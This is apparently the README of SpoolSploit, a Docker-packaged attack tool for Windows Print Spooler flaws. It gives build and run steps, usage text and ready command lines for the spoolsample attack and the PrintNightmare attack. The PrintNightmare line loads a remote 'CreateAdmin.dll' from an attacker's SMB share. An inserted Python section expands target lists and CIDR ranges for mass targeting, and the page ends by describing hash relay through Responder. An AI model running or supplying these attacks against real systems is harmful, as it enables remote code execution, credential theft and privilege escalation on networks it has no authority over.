2021-10-07 14:33:23
Getting Started
As of the release date the SpoolSploit Docker container has been tested successfully on the latest versions of MacOS, Ubuntu Linux, and Windows 10. Although not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as Windows uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the Docker container in a virtual machine that has its network adapter configured in bridge mode. This will allow for serving malicious DLLs and relaying credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or on a compromised server share.
Create and access the SpoolSploit Docker container
1. Clone this repository
   git clone https://github.com/BeetleChunks/SpoolSploit
2. Build the SpoolSploit Docker container image
   cd SpoolSploit
   sudo docker build -t spoolsploit .
3. Create and start the SpoolSploit Docker container
   sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest
4. Attach to the container
   sudo docker exec -it spoolsploit /bin/bash
Command-line Usage
usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD

optional arguments:
  -h, --help            show this help message and exit
  -a {spoolsample,nightmare}, --attack {spoolsample,nightmare}
                        Attack type to execute on target(s).
  -rH RHOST, --rhost RHOST
                        Remote target IP, CIDR range, or filename (file:)
  -rP {139,445}, --rport {139,445}
                        Remote SMB server port.
  -lH LHOST, --lhost LHOST
                        Listening hostname or IP
  -lS LSHARE, --lshare LSHARE
                        Staging SMB share (UNC)
  -d DOMAIN, --domain DOMAIN
                        Domain for authentication
  -u USER, --username USER
                        Username for authentication
  -p PASSWD, --password PASSWD
                        Password for authentication

Example - spoolsample:
  python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10

Example - nightmare:
  python3 spool_sploit.py -a nightmare -lS '\\10.14.1.24\C$\CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10
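The help text above describes three forms for -rH/--rhost (a single IP, a CIDR range, or a "file:" reference) and two listener options that only make sense for one attack each. The following is an added example, not SpoolSploit's own code, of an argparse front end that mirrors that usage and shows how such a target specification can be expanded and validated before anything is run. The "#"-comment handling in target files, the hostname pass-through, and the rule that spoolsample needs -lH while nightmare needs -lS are assumptions made for the example, not behaviour documented by the project.

```python
"""Added example: parse the spool_sploit.py-style command line and expand
the -rH target specification. Not the project's own code."""
import argparse
import ipaddress
from typing import List

ATTACKS = ("spoolsample", "nightmare")


def build_parser() -> argparse.ArgumentParser:
    """Option set copied from the usage text above (short and long forms)."""
    p = argparse.ArgumentParser(prog="spool_sploit.py")
    p.add_argument("-a", "--attack", choices=ATTACKS, required=True,
                   help="Attack type to execute on target(s).")
    p.add_argument("-rH", "--rhost", required=True,
                   help="Remote target IP, CIDR range, or filename (file:)")
    p.add_argument("-rP", "--rport", type=int, choices=(139, 445), required=True,
                   help="Remote SMB server port.")
    p.add_argument("-lH", "--lhost", help="Listening hostname or IP")
    p.add_argument("-lS", "--lshare", help="Staging SMB share (UNC)")
    p.add_argument("-d", "--domain", required=True)
    p.add_argument("-u", "--username", required=True)
    p.add_argument("-p", "--password", required=True)
    return p


def expand_targets(rhost: str) -> List[str]:
    """Turn one -rH value into a flat list of host strings.

    file:<path>   one target per non-empty line; lines starting with '#' are
                  skipped (assumption for this example) and each line is itself
                  expanded, so a file may mix IPs and CIDR ranges
    a.b.c.d/nn    every usable host address in the range
    a.b.c.d       the single address; anything else is treated as a hostname
    """
    if rhost.startswith("file:"):
        targets: List[str] = []
        with open(rhost[len("file:"):], encoding="utf-8") as fh:
            for line in fh:
                line = line.strip()
                if line and not line.startswith("#"):
                    targets.extend(expand_targets(line))
        return targets
    if "/" in rhost:
        net = ipaddress.ip_network(rhost, strict=False)
        return [str(h) for h in net.hosts()]
    try:
        return [str(ipaddress.ip_address(rhost))]
    except ValueError:
        return [rhost]  # not an IP literal: pass through as a hostname


def validate(args: argparse.Namespace) -> List[str]:
    """Return a list of configuration problems (empty means consistent).

    The pairing of attack type to listener option is an assumption drawn from
    the two example command lines above.
    """
    problems = []
    if args.attack == "spoolsample" and not args.lhost:
        problems.append("spoolsample needs -lH/--lhost (where the target should connect back)")
    if args.attack == "nightmare" and not args.lshare:
        problems.append("nightmare needs -lS/--lshare (UNC path of the staged DLL)")
    if args.lshare and not args.lshare.startswith("\\\\"):
        problems.append("-lS must be a UNC path such as \\\\host\\share\\file.dll")
    return problems


if __name__ == "__main__":
    # Constructed sample: the spoolsample example from the usage text.
    ns = build_parser().parse_args(
        ["-a", "spoolsample", "-lH", "10.14.1.24", "-d", "evil.corp",
         "-u", "rjmcdow", "-p", "P4ssword123!", "-rP", "445", "-rH", "10.5.1.10"])
    print("targets:", expand_targets(ns.rhost))
    print("problems:", validate(ns) or "none")
```

Because expand_targets recurses on each line of a "file:" list, a target file can hold a mix of single addresses and CIDR ranges; a /30 such as 10.5.1.0/30 expands to its two usable hosts, and a bare hostname is passed through unchanged for the SMB layer to resolve.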
SpoolSample - Capture and relay Windows machine account credentials
The SpoolSploit Docker container includes Responder (https://github.com/lgandx/Responder) for relaying machine account hashes obtained from executing the spoolsample attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.